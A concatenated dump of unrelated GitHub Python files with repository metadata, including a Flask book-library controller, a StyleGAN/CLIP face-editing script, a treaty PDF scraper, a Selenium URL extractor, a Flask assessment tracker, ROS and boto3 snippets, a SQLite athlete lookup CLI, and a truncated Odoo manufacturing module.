'created_at': datetime.datetime.strftime(book.li_fecha_creacion, '%Y-%m-%d'),
'comments': [
{
'text': comment.cm_texto,
'date': comment.cm_fecha_creacion,
'autor': comment.autor.usuario.complete_name(),
'username': comment.autor.usuario.us_nombre_usuario,
'autor_id': comment.autor.ai_id,
} for comment in book.comentarios
],
'genre': [
{
'id': word.ge_id,
'desc': word.ge_descripcion,
} for word in book.generos
],
}
res['success'] = True
res['book'] = book_body
resp = jsonify(res)
return resp, 200
except Exception as e:
print(e)
# db.session.rollback()
res['msg'] = 'Hubo un error al cargar el Libro, inténtelo nuevamente'
resp = jsonify(res)
return resp, 500
@staticmethod
def getBookStatistics(book_id):
try:
res = {
'success': False,
}
book = tables.Libro.exists(book_id)
if not book:
return render_template('errors/404.html'), 404
# book = tables.Libro.get_book(book_id)
book_body = {
'id': book.li_id,
'keywords': [
{
'text': word.pc_palabra,
'weight': word.pc_ocurrencia
} for word in book.palabras_clave
],
'comments': [
{
'text': comment.cm_texto,
'date': comment.cm_fecha_creacion,
'autor': comment.autor.usuario.complete_name(),
'username': comment.autor.usuario.us_nombre_usuario,
'autor_id': comment.autor.ai_id,
} for comment in book.comentarios
],
'title': book.li_titulo,
'image': book.li_imagen,
'downloads': book.li_num_descargas,
'views': book.li_numero_vistas,
'file': book.li_archivo,
'language': book.li_idioma,
'genre': [
{
'id': word.ge_id,
'desc': word.ge_descripcion,
} for word in book.generos
],
}
commentTf = CommentHandler.CommentHandler('es', book_body['comments'])
res['success'] = True
res['book'] = book_body
res['comment_wc'] = [{'text': word[0], 'weight': word[1]} for word in commentTf.get_word_cloud(0.5)]
resp = jsonify(res)
return resp, 200
except Exception as e:
print(e)
# db.session.rollback()
res['msg'] = 'Hubo un error al cargar el Libro, inténtelo nuevamente'
resp = jsonify(res)
return resp, 500
@staticmethod
def getBooksStatistics(autor_id):
try:
res = {
'success': False,
}
autor = tables.AutorIndie.exists(autor_id)
if not autor:
return render_template('errors/404.html'), 404
books = autor.publicacion
report_body = [
{
'id': book.li_id,
'title': book.li_titulo,
'image': book.li_imagen,
'downloads': book.li_num_descargas,
'views': book.li_numero_vistas,
'likes': int(np.sum([ like.lk_puntaje for like in book.likes ]))
}
for book in books
]
keywords = []
for book in books:
_keywords = [ {'text': keyword.pc_palabra, 'weight': keyword.pc_ocurrencia } for keyword in book.palabras_clave ]
keywords.extend(_keywords)
res['word_cloud_keywords'] = keywords
res['success'] = True
res['books'] = report_body
resp = jsonify(res)
return resp, 200
except Exception as e:
print(e)
# db.session.rollback()
res['msg'] = 'Hubo un error al cargar el Libro, inténtelo nuevamente'
resp = jsonify(res)
return resp, 500
@staticmethod
def searchBook(query_p, db, response):
try:
res = {
'success': False,
}
books = tables.Libro.query.filter(
tables.Libro.autor.like('%{}%'.format(query_p)) |
tables.Libro.nombre_tables.Libro.like('%{}%'.format(query_p)),
tables.Libro.activo == 1
).all()
if books == None:
res['books'] = []
else:
# print(books.comentarios)
serialized = [ { 'id': i.id,
'name': i.nombre_tables.Libro,
'file': i.nombre_archivo,
'author': i.autor,
'likes': i.likes,
'licencia': i.licencia,
'image': i.imagen } for i in books ]
res['books'] = serialized
res['success'] = True
except Exception as e:
print(e)
# db.session.rollback()
res['msg'] = 'Hubo un error al cargar el tables.Libro, inténtelo nuevamente'
finally:
return response(json.dumps(res), mimetype='application/json')
@staticmethod
def denounceBook(book_id):
try:
res = {
'success': False,
}
req = request.get_json()
print(req)
denounce = tables.Denuncias(
de_descripcion=req['desc'],
autor_id=req['autor_id'],
libro_id=book_id
)
print(denounce)
denounce.save()
res['success'] = True
res['msg'] = 'El libro acaba de ser denunciado, revisaremos su solicitud para tomar las acciones pertinentes, gracias'
return jsonify(res), 200
except Exception as e:
print(e)
res['msg'] = 'Hubo un error al procesar su solicitud, inténtelo nuevamente'
return jsonify(res), 500
@staticmethod
def rateBook(book_id):
try:
res = {
'success': False,
}
req = request.get_json()
rate = tables.Like.exists(req['autor_id'], book_id)
if not rate:
like = tables.Like(
autor_id=req['autor_id'],
libro_id=book_id,
lk_puntaje=req['rating']
)
like.save()
else:
rate.lk_puntaje = req['rating']
rate.save()
res['success'] = True
res['msg'] = 'Se agrego su puntuación'
return jsonify(res), 200
except Exception as e:
print(e)
res['msg'] = 'Hubo un error al agregar su puntuacion'
return jsonify(res), 500
@staticmethod
def getRating(book_id, autor_id):
try:
res = {
'success': False,
}
rate = tables.Like.exists(autor_id, book_id)
res['rating'] = rate.lk_puntaje if rate else 0
res['success'] = True
res['msg'] = 'Se agrego su puntuación'
return jsonify(res), 200
except Exception as e:
print(e)
res['msg'] = 'Hubo un error al agregar su puntuacion'
return jsonify(res), 500
@staticmethod
def uploadBook(db, request, response):
try:
res = {
'success': False,
}
if request.method == 'POST':
if 'filebook' not in request.files:
res['success'] = False
res['msg'] = 'Debe seleccionar un archivo del escrito'
res['code'] = 400
bookfile = request.files['filebook']
imgfile = request.files['fileimg'] if 'fileimg' in request.files else None
if bookfile.filename == '':
res['success'] = False
res['msg'] = 'Debe seleccionar un archivo del escrito'
res['code'] = 400
if (bookfile and allowed_file(bookfile, 'book')) and (imgfile or allowed_file(imgfile, 'img')):
bookfilename = uuid.uuid4().hex + secure_filename(bookfile.filename)
imgfilename = uuid.uuid4().hex + secure_filename(imgfile.filename) if imgfile else None
autor = tables.AutorIndie.exists(request.form['autor_id'])
newBook = tables.Libro(
li_titulo=request.form['book'],
li_idioma=request.form['language'],
li_licencia=request.form['licence'],
li_archivo=bookfilename,
li_imagen=imgfilename,
)
autor.publicacion.append(newBook)
tables.AutorIndie.save(autor)
# db.session.add(autor)
genero = tables.Genero(ge_descripcion = request.form['genre'])
newBook.generos.append(genero)
path_book = os.path.join(env['UPLOADS_DIR'] + '/books', bookfilename)
bookfile.save(path_book)
pdfHandler = PdfHandler.PdfHandler(request.form['language'], path_book)
# pdfHandler = PdfHandler(request.form['language'])
word_cloud, df = pdfHandler.get_word_cloud(0.15)
# csv = CsvHandler.CsvHandler(bookfilename.replace('.pdf', '.csv'))
# newBook.li_keywords_csv = csv_file
newBook.saveKeyWords(word_cloud)
# tables.Libro.save(newBook)
newBook.save()
if imgfilename != None: imgfile.save(os.path.join(env['UPLOADS_DIR'] + '/images', imgfilename))
res['success'] = True
res['route'] = 'libro-exito'
res['book_id'] = newBook.li_id
else:
print('err')
res['success'] = False
res['msg'] = 'Formato no aceptado'
res['code'] = 400
resp = jsonify(res)
return resp, 200
except Exception as e:
db.session.rollback()
res['route'] = 'libro-error'
resp = jsonify(res)
return resp, 500
@staticmethod
def downloadBook(book_id):
res = { 'success': False }
try:
book = tables.Libro.exists(book_id)
if not book:
return render_template('errors/404.html'), 404
book.update_num_downloads()
res['success'] = True
res['downloads_counter'] = book.li_num_descargas
return jsonify(res), 200
except Exception as e:
print(e)
res['msg'] = 'Hubo un error al actualizar el contador de descargas'
return jsonify(res), 200
@staticmethod
def commentBook():
res = { 'success': False }
try:
req = request.get_json()
book = tables.Libro.exists(req['book_id'])
if not book:
return render_template('errors/404.html'), 404
comment = tables.Comentario(
libro_id=req['book_id'],
autor_id=req['autor_id'],
cm_texto=req['text'],
)
book.comentarios.append(comment)
book.save()
res['success'] = True
res['comment'] = {
'text': comment.cm_texto,
'date': comment.cm_fecha_creacion,
'autor': comment.autor.usuario.complete_name(),
'username': comment.autor.usuario.us_nombre_usuario,
'autor_id': comment.autor.ai_id,
}
# res['downloads_counter'] = book.li_num_descargas
return jsonify(res), 200
except Exception as e:
print(e)
res['msg'] = 'Hubo un error al actualizar el contador de descargas'
return jsonify(res), 200
|
pabloIO/LIBREria_bo
|
controllers/libros_ctrl.py
|
libros_ctrl.py
|
py
| 16,176 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37511806658
|
from invimg.scripts.inference import invert
import math
import os
import torch
import torchvision
from tqdm import tqdm
import numpy as np
from optimclip.criteria.clip_loss import CLIPLoss
from optimclip.criteria.id_loss import IDLoss
from optimclip.models.stylegan2.model import Generator
import clip
from faceparsing.test import evaluate
from PIL import Image
from torchvision import transforms
from run_config.config import Options
STYLESPACE_DIMENSIONS = [512 for _ in range(15)] + [256, 256, 256] + [128, 128, 128] + [64, 64, 64] + [32, 32]
# invert()
STYLESPACE_INDICES_WITHOUT_TORGB = [i for i in range(len(STYLESPACE_DIMENSIONS)) if i not in list(range(1, len(STYLESPACE_DIMENSIONS), 3))]
def get_ganmodel(opts):
generator = Generator(opts.size, 512, 8, channel_multiplier=2)
# TODO 看看generator
model = torch.load(opts.gan_model)['g_ema']
generator.load_state_dict(model, strict=True)
generator = generator.eval().cuda()
return generator
def get_lr(t, initial_lr, rampdown=0.25, rampup=0.05):
lr_ramp = min(1, (1 - t) / rampdown)
lr_ramp = 0.5 - 0.5 * math.cos(lr_ramp * math.pi)
lr_ramp = lr_ramp * min(1, t / rampup)
return initial_lr * lr_ramp
def get_init_latent(orig_pic):
latent_path = 'result/inv/latents.npy'
try:
latents = np.load(latent_path, allow_pickle=True).item()
latent_code = np.expand_dims(np.array(latents[orig_pic]), axis=0)
except FileNotFoundError:
invert() # 没有当前图片的latent code,再invert一遍
latents = np.load(latent_path, allow_pickle=True).item()
latent_code = np.expand_dims(np.array(latents[orig_pic]), axis=0)
latent_code_init = torch.tensor(latent_code).cuda()
deltas_path = 'result/inv/weight_deltas/' + orig_pic.split('.')[0] + '.npy'
deltas = np.load(deltas_path, allow_pickle=True)
deltas = [torch.from_numpy(w).cuda() if w is not None else None for w in deltas]
return latent_code_init, deltas
def get_imgloss(region, orig_img, img_gen, mask):
img_loss_sum = torch.sum(torch.square(orig_img - img_gen))
img_loss = 0
if region:
if 'bbox' in region:
bbox = region['bbox']
crop_area = (orig_img - img_gen)[:][:][bbox[0]:bbox[1]][bbox[2]:bbox[3]]
img_loss = img_loss_sum - torch.sum(torch.square(crop_area))
area = opts.size ** 2 - abs(bbox[0] - bbox[1]) * abs(bbox[2] - bbox[3]) # 剩余的面积
img_loss /= area
elif 'organ' in region:
# print(mask.shape)
img_loss = torch.sum(torch.square(orig_img * mask - img_gen * mask))
area = mask.norm(1) # 1的个数即为他的一范数
img_loss /= area
else:
print('region输入错误')
else:
img_loss = img_loss_sum / (opts.size ** 2)
return img_loss
def optim(text, input_img, opts, region):
# 分词并拼接
edit_text = torch.cat([clip.tokenize(text)]).cuda()
orig_img = Image.open(input_img)
convert = transforms.ToTensor()
normalize = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
orig_img = normalize(convert(orig_img))
orig_img = orig_img.unsqueeze(0).cuda()
orig_pic = str(input_img).split('/')[-1]
latent_code_init, deltas = get_init_latent(orig_pic)
os.makedirs(opts.results, exist_ok=True)
gan_generator = get_ganmodel(opts)
with torch.no_grad():
latent_code_init = gan_generator([latent_code_init], input_is_latent=True, return_latents=True)
# 生成初始图片
with torch.no_grad():
inv_img, _ = gan_generator([latent_code_init], input_is_latent=True,input_is_stylespace=True, randomize_noise=True,
)
latent = [s.detach().clone() for s in latent_code_init]
for c, s in enumerate(latent):
if c in STYLESPACE_INDICES_WITHOUT_TORGB:
s.requires_grad = True
latent = latent_code_init.clone().detach()
latent.requires_grad = True
clip_loss = CLIPLoss(opts)
id_loss = IDLoss(opts)
optimizer = torch.optim.Adam(latent, lr=opts.alpha)
# 得到感兴趣的区域的mask
mask = None
if region and 'organ' in region:
evaluate(region['organ'], 'result/faceparsing/', dspth='input_img/', cp='./faceparsing/res/cp/79999_iter.pth')
mask = Image.open('result/faceparsing/' + orig_pic)
mask = convert(mask).cuda()
mask = mask.repeat(3, 1, 1)
mask = mask.unsqueeze(0)
pbar = tqdm(range(opts.step))
for i in pbar:
t = i / opts.step
lr = get_lr(t, opts.alpha)
optimizer.param_groups[0]["lr"] = lr
img_gen, _ = gan_generator([latent], input_is_latent=True, input_is_stylespace=True, randomize_noise=True)
c_loss = clip_loss(img_gen, edit_text)
if opts.id_lambda > 0:
i_loss = id_loss(img_gen, inv_img)[0]
else:
i_loss = 0 # 不需要idloss就不跑模型了,节省时间
latent_loss = sum([((latent_code_init[c] - latent[c]) ** 2).sum() for c in range(len(latent_code_init))])
img_loss = get_imgloss(region, orig_img, img_gen, mask)
# print('latent_loss', latent_loss)
# print('img_loss', img_loss)
loss = c_loss + opts.latent_lambda * latent_loss + opts.id_lambda * i_loss + opts.img_lambda * img_loss
optimizer.zero_grad()
loss.backward()
optimizer.step()
pbar.set_description(
(
f"loss: {loss.item():.4f};"
)
)
if opts.save_intermediate_image_every > 0 and i % opts.save_intermediate_image_every == 0:
with torch.no_grad():
img_gen, _ = gan_generator([latent], input_is_latent=True, input_is_stylespace=True, randomize_noise=True)
torchvision.utils.save_image(img_gen, f"result/opt/{str(i).zfill(5)}.jpg", normalize=True, range=(-1, 1))
final_result = torch.cat([orig_img, inv_img, img_gen, mask])
torchvision.utils.save_image(final_result.detach().cpu(), os.path.join(opts.results, "final_result.jpg"),
normalize=True, scale_each=True, range=(-1, 1))
return final_result
if __name__ == '__main__':
opts = Options().get_args()
result = optim(text='blue eyes', input_img='input_img/img1.png', opts=opts, region={'organ': ['hair']})
from torchvision.utils import make_grid
from torchvision.transforms import ToPILImage
result_image = ToPILImage()(
make_grid(result.detach().cpu(), normalize=True, scale_each=True, range=(-1, 1), padding=0))
h, w = result_image.size
result_image.resize((h // 2, w // 2))
import matplotlib.pyplot as plt
plt.imshow(result_image)
plt.show()
|
wangyuchi369/makeup-clip
|
test.py
|
test.py
|
py
| 6,753 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16897266155
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.13.8
# kernelspec:
# display_name: Python [conda env:root] *
# language: python
# name: conda-root-py
# ---
import os
import requests
from bs4 import BeautifulSoup
from io import BytesIO
import PyPDF2
import pandas as pd
"""Scrapes UNCTAD website for all international investment agreemets."""
url = "https://investmentpolicy.unctad.org/international-investment-agreements/iia-mapping"
key = "treaty-files/"
soup = BeautifulSoup(requests.get(url).content, "html.parser")
def parse_iia_txt(link):
pdf_bytes = requests.get(link).content
p = BytesIO(pdf_bytes)
try:
read_pdf = PyPDF2.PdfFileReader(p, strict=False)
count = read_pdf.numPages
print(link)
treaty_txt = ''
for page_number in range(count):
page = read_pdf.getPage(page_number)
page_content = page.extractText()
treaty_txt += '\n ' + page_content
return treaty_txt
except:
bad_links.append(link)
#return None
pass
# +
data = []
bad_links = []
table = soup.find('table', attrs={'class':'table ajax'})
table_body = table.find('tbody')
rows = table_body.find_all('tr')
total = len(rows)
for num, row in enumerate(rows):
print(f"Now on treaty {num} out of {total}.")
row_dict = {'link': None,
'parties': None,
'status': None,
'language': None,
'sign_date': None,
'entry_force_date': None,
'termination_date': None,
'text': None}
for link in row.find_all('a'):
if key in link.get("href", ""):
row_dict['link'] = ("https://investmentpolicy.unctad.org" + link.get("href"))
row_dict['text'] = parse_iia_txt(row_dict['link'])
row_dict['title'] = row.find_all("td", {'data-index' : "2"})[0].text
row_dict['parties'] = row.find_all("td", {'data-index' : "5"})[0].text
row_dict['status'] = row.find_all("td", {'data-index' : "4"})[0].text
row_dict['sign_date'] = row.find_all("td", {'data-index' : "6"})[0].text
row_dict['entry_force_date'] = row.find_all("td", {'data-index' : "7"})[0].text
row_dict['termination_date'] = row.find_all("td", {'data-index' : "8"})[0].text
row_dict['language'] = row.find_all("td", {'data-index' : "9"})[0].text
data.append(row_dict)
# -
treaty_df = pd.DataFrame(data)
treaty_df
treaty_df.to_csv("raw_iia.csv",index=False)
|
amvelazquez/iia-analysis
|
scrape_treaty_db.py
|
scrape_treaty_db.py
|
py
| 2,671 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71404988987
|
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from contextlib import contextmanager
import pathlib
import shutup
# shut those annoying warnings
shutup.please()
# configure selenium
chromedriver_location = f"{next(pathlib.Path('.').glob('**/chromedriver'))}" #dynamically find chromedriver
chrome_options = Options()
chrome_options.add_argument('--headless')
def constructUrl(start):
"""Construct urls from start string."""
constructed_url = list()
for c in start[1:]: # avoid the initial double quote
# append valid url characters
if c.isalnum() or c in ['-','.','_','~',':','/','?','#','[',']','@','!','$','&',"'",'(',')','*','+',',',';','=']:
constructed_url.append(c)
else:
break
return ''.join(constructed_url)
def extractUrls(driver, extract_from='https://www.google.com/', query='', debug=False):
"""Extract urls from page."""
url_initial = '"https'
se_url = 'search?q='.join([extract_from, query])
driver.get(se_url)
response_html = str(driver.page_source.encode('utf-8')) #assign bytes in string format
url_list = list()
for url in range(response_html.count(url_initial)):
if debug:
print(f'{len(url_list)} urls extracted from {se_url}\r', end='', flush=True)
if url == 0:
url_list.append(constructUrl(start=response_html[response_html.find(url_initial):]))
continue
response_html = response_html.split(url_initial, 1)[1]
url_list.append(constructUrl(start=response_html[response_html.find(url_initial):]))
url_list_no_duplicates = list(dict.fromkeys(url_list))
if debug:
print(f'\nwithout duplicates: {len(url_list_no_duplicates)}', end='')
return url_list_no_duplicates
|
ihiiro/Intelligence
|
intel_engine/url_extractor.py
|
url_extractor.py
|
py
| 1,803 |
python
|
en
|
code
| 0 |
github-code
|
6
|
373981387
|
from app import app
from flask import render_template,flash, request, redirect, url_for
from .forms import CalculatorForm, ButtonForm
from app import db, models
import datetime
@app.route('/')
def index():
greeting = "Hello World!!!"
title = "Homepage"
# return redirect(url_for('create_assessment'))
return render_template('index.html',
title=title,
greeting=greeting)
@app.route('/create_assessment', methods=['GET','POST'])
def create_assessment():
title = "Create Assessment"
header = "Create Assessment"
form = CalculatorForm()
if request.method == 'POST':
if form.validate_on_submit():
p = models.Assessments(title=form.title.data, module_code=form.module_code.data, deadline=form.deadline.data, description=form.description.data)
db.session.add(p)
db.session.commit()
flash('Succesfully submitted data')
return redirect(url_for('create_assessment'))
return render_template('create_assessment.html',
title=title,
header=header,
form=form)
@app.route('/all_assessments')
def all_assessments():
title = "All Assessment"
header = "All Assessments"
form = CalculatorForm()
data = models.Assessments.query.all()
return render_template('all_assessments.html',
title=title,
header=header,
form=form,
data=data)
@app.route('/completed_assessments', methods=['GET', 'POST'])
def completed_assessments():
title = "Completed Assessments"
header = "Completed Assessments"
data = models.Assessments.query.filter_by(status='Completed').all()
form = CalculatorForm()
#check if request method is POST
if request.method == 'POST':
try:
#get the button id & convert it to an integer
id = request.form['button']
id = int(id)
#retrieve the id from the button & update assessment status
p = models.Assessments.query.get(id)
p.status = 'Uncompleted'
db.session.commit()
flash("Assessment Marked As 'Incomplete'")
return redirect(url_for('completed_assessments'))
except:
flash("Unable to mark assessment as 'Incomplete'", "danger")
return redirect(url_for('completed_assessments'))
return render_template('completed_assessments.html',
title=title,
header=header,
form=form,
data=data)
@app.route('/uncompleted_assessments', methods=['GET', 'POST'])
def uncompleted_assessments():
title = "Uncompleted Assessments"
header = "Uncompleted Assessments"
data = models.Assessments.query.filter_by(status='Uncompleted').all()
form = CalculatorForm()
#check if request methos is POST
if request.method == 'POST':
# when a specific button is clicked on, mark as completed & reload the page
try:
#get the button id & convert it to an integer
id = request.form['button']
id = int(id)
#retrieve the id from the button & update assessment status
p = models.Assessments.query.get(id)
p.status = 'Completed'
db.session.commit()
flash("Assessment Marked As 'Complete'")
#refreshs the page after adding to database
return redirect(url_for('uncompleted_assessments'))
except:
flash("Unable to mark assessment as 'Complete'", "danger")
return redirect(url_for('uncompleted_assessments'))
return render_template('uncompleted_assessments.html',
title=title,
header=header,
form=form,
data=data)
|
Lanrayy/web-app-development-comp2011-cwk1
|
app/views.py
|
views.py
|
py
| 4,045 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10625323914
|
import boto3
access_key = ''
secret_access_key = ''
def get_all_clusters():
ecs_client = boto3.client('ecs', aws_access_key_id=access_key, aws_secret_access_key=secret_access_key)
response = ecs_client.list_clusters()
cluster_arns = response['clusterArns']
return cluster_arns
# print(get_all_regions())
# Get all clusters
clusters = get_all_clusters()
print(clusters)
# Print the clusters
for cluster_arn in clusters:
print(cluster_arn)
|
PrantaChakraborty/boto3
|
s3/ecs.py
|
ecs.py
|
py
| 462 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16442943983
|
#!/usr/bin/env python
"""
Created on Wed Jan 20 20:53:20 2020
@author: yuweiwu
Usage: This is the script to create the node lidar_processing
and three topic:closest_point, farthest_point and scan_range
"""
import rospy
#import math
import numpy as np
import std_msgs.msg
from sensor_msgs.msg import LaserScan
from yuweiwu_roslab.msg import scan_range
def lidar_processing():
#initial the node
rospy.init_node("lidar_processing", anonymous = True)
#create topic closest_point
closest_pub = rospy.Publisher('closest_point', std_msgs.msg.Float64, queue_size = 10)
#create topic farthest_point
farthest_pub = rospy.Publisher('farthest_point', std_msgs.msg.Float64, queue_size = 10)
#create topic scan_range
scan = rospy.Publisher('scan_range', scan_range, queue_size = 10)
def callback(msg):
#rate = rospy.Rate(1) # if want to control it
data = scan_range()
data.header = std_msgs.msg.Header(stamp = rospy.Time.now(), frame_id="base")
#if not math.isnan(max(msg.ranges)) and not math.isinf(max(msg.ranges)):
#we can use isnan and isinf to check the data if needed
data.scan_max = np.float64(max(msg.ranges))
#if not math.isnan(min(msg.ranges)) and not math.isinf(min(msg.ranges)):
data.scan_min = np.float64(min(msg.ranges))
# publish all
closest_pub.publish(data.scan_min)
farthest_pub.publish(data.scan_max)
scan.publish(data)
rospy.Subscriber("scan", LaserScan, callback)
rospy.spin()
if __name__ == "__main__":
lidar_processing()
|
yuwei-wu/F110-autonomous-racing
|
yuweiwu_roslab/scripts/lidar_processing.py
|
lidar_processing.py
|
py
| 1,597 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26257817866
|
# Imports
import users
import find_athlete
import sys
import sqlalchemy as sa
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
import uuid
import datetime
# Global variables
task = """ Задание №1:
Напишите модуль users.py, который регистрирует новых пользователей. Скрипт должен запрашивать следующие данные:
* имя
* фамилию
* пол
* адрес электронной почты
* дату рождения
* рост
------------------
Задание 2
Напишите модуль find_athlete.py поиска ближайшего к пользователю атлета. Логика работы модуля такова:
* запросить идентификатор пользователя;
* если пользователь с таким идентификатором существует в таблице user,
то вывести на экран двух атлетов: ближайшего по дате рождения к данному пользователю
и ближайшего по росту к данному пользователю;
* если пользователя с таким идентификатором нет, вывести соответствующее сообщение.
"""
DB_PATH = "sqlite:///sochi_athletes.sqlite3"
Base = declarative_base()
# Class definitions
class bcolors:
HEADER = '\033[96m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# Function definitions
def connect_db():
# create connection
engine = sa.create_engine(DB_PATH)
# create tables
Base.metadata.create_all(engine)
# create session fabric
session = sessionmaker(engine)
# Return session
return session()
def choose_mode():
print(bcolors.HEADER + "\n---------------------------------------------")
print(" Модуль B4, домашнее задание: \n")
print(bcolors.BOLD + " [1] Добавить пользователя в базу /задание №1/")
print(bcolors.BOLD +
" [2] Похожие на пользователя атлеты /задание №2/\n " + bcolors.ENDC)
print(bcolors.HEADER + " [3] Найти пользователя по ID")
print(" [4] Найти атлета похожего по возрасту на пользователя")
print(" [5] Найти атлета похожего по росту на пользователя\n ")
print(" [6] Вывести условия задачи\n ")
print(" [7] Выход\n")
print("---------------------------------------------" + bcolors.ENDC)
while True:
mode = input("\nВыберите, пожалуйста, пункт меню: ")
try:
mode = int(mode)
except ValueError:
print(bcolors.FAIL + "ERROR: Необходимо ввести номер пункта" + bcolors.ENDC)
continue
if 1 <= mode <= 7:
break
else:
print(bcolors.FAIL + "ERROR: Такого пункта не существует" + bcolors.ENDC)
return mode
def input_request(mode):
""""
Запрашивает и результирует данные
"""
session = connect_db()
if mode == 1:
"""
Пункт меню: добавление пользователя в базу
"""
# DONE
users.add(session, bcolors())
if mode == 2:
"""
Вывод по заданию
"""
print(bcolors.OKGREEN +
"\n Ищем атлетов - ближайших ровесников пользователя," +
"\n а также атлетов одинакового с пользователем роста.\n" + bcolors.ENDC)
id = id_ask()
res = users.find_id(id, session)
if res:
print(bcolors.OKGREEN +
f"\n Найден пользователь: {res}" + bcolors.ENDC)
# Ищем ближайших ровесников
ath_str = find_athlete.bday_compare(id, session)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
print(bcolors.OKGREEN +
f"\n Самые близкие ровесники - атлеты: \n{ath_str}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
ath_str = find_athlete.height_compare(id, session, bcolors())
if ath_str != "":
print(bcolors.OKGREEN +
f" Атлеты с одинаковым ростом:\n" + bcolors.ENDC)
# input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
print(bcolors.OKGREEN + f"{ath_str}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
print(bcolors.FAIL +
f"ERROR: Пользователь с ID:{id} не найден" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 3:
"""
Пункт меню: поиск пользователя по ID
"""
# DONE
print(bcolors.OKGREEN + "\n Ищем пользователя по ID:\n" + bcolors.ENDC)
id = id_ask()
res = users.find_id(id, session)
if res:
print(bcolors.OKGREEN +
f"\n Найден пользователь: {res}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
print(bcolors.FAIL +
f"\nERROR: Пользователь с ID:{id} не найден" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 4:
"""
Поиск атлета по параметрам даты рождения пользователя
"""
print(bcolors.OKGREEN +
"\n Ищем атлета по параметрам даты рождения пользователя:\n" + bcolors.ENDC)
id = id_ask()
res = users.find_id(id, session)
if res:
print(bcolors.OKGREEN +
f"\n Найден пользователь: {res}" + bcolors.ENDC)
# Ищем подходящих атлетов:
ath = find_athlete.bday_compare(id, session)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
print(bcolors.OKGREEN +
f"\n Самые близкие ровесники: \n{ath}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
print(bcolors.FAIL +
f"\nERROR: Пользователь с ID:{id} не найден" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 5:
"""
Поиск атлета по параметрам роста пользователя
"""
print(bcolors.OKGREEN +
"\n Ищем атлета по параметрам пользователя:\n" + bcolors.ENDC)
id = id_ask()
res = users.find_id(id, session)
if res:
print(bcolors.OKGREEN +
f"\n Найден пользователь: {res}" + bcolors.ENDC)
# Ищем подходящего атлета:
ath = find_athlete.height_compare(id, session, bcolors())
if ath != "":
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
print(bcolors.OKGREEN + f"{ath}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
print(bcolors.FAIL +
f"\nERROR: Пользователь с ID:{id} не найден" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 6:
print(bcolors.OKBLUE + "\n" + task + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 7:
print(bcolors.WARNING + bcolors.BOLD +
"\nХорошего дня!\n" + bcolors.ENDC)
sys.exit(0)
return 0
def id_ask():
"""
Проверка корректности введенного ID
"""
while True:
id_raw = input("Введите ID пользователя: ")
try:
answer = int(id_raw)
except ValueError:
print(bcolors.FAIL + "ERROR: Необходимо ввести номер ID\n" + bcolors.ENDC)
continue
if answer > 0:
break
else:
print(bcolors.FAIL + "ERROR: Такого ID не существует\n" + bcolors.ENDC)
return answer
def main():
"""
Launcher.
"""
while True:
input_request(choose_mode())
if __name__ == "__main__":
main()
# DEBUG
|
vsixtynine/sf-sql-task
|
start.py
|
start.py
|
py
| 9,483 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
29643349641
|
# -*- coding: utf-8 -*-
# (c) 2015 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import models, fields, api, _
class MrpProduction(models.Model):
_inherit = 'mrp.production'
plan = fields.Many2one('procurement.plan', string='Plan')
@api.multi
def action_confirm(self):
proc_obj = self.env['procurement.order']
res = super(MrpProduction, self).action_confirm()
for production in self:
if (production.project_id and production.plan and not
production.sale_id):
old_project = production.plan.project_id
if old_project.id != production.project_id.id:
production.plan.project_id = production.project_id.id
old_project.unlink()
cond = [('production_id', '=', production.id)]
proc = proc_obj.search(cond, limit=1)
if proc:
self._treat_procurements_reservations(proc)
return res
@api.multi
def _treat_procurements_reservations(self, proc):
self.ensure_one()
reservation_obj = self.env['stock.reservation']
proc_obj = self.env['procurement.order']
level = 1
if proc.level:
level = proc.level + 1
cond = [('parent_procurement_id', 'child_of', proc.id),
('id', '!=', proc.id),
('level', '=', level)]
procs = proc_obj.search(cond)
if procs:
for proc in procs:
cond = [('procurement_from_plan', '=', proc.id)]
reservation = reservation_obj.search(cond, limit=1)
reservation.release()
@api.multi
def button_create_plan(self):
plan_obj = self.env['procurement.plan']
proc_obj = self.env['procurement.order']
project_obj = self.env['project.project']
warehouse_obj = self.env['stock.warehouse']
for production in self:
project_vals = {
'name': _('Generated from MO: ') + production.name}
project = project_obj.create(project_vals)
proc_vals = {
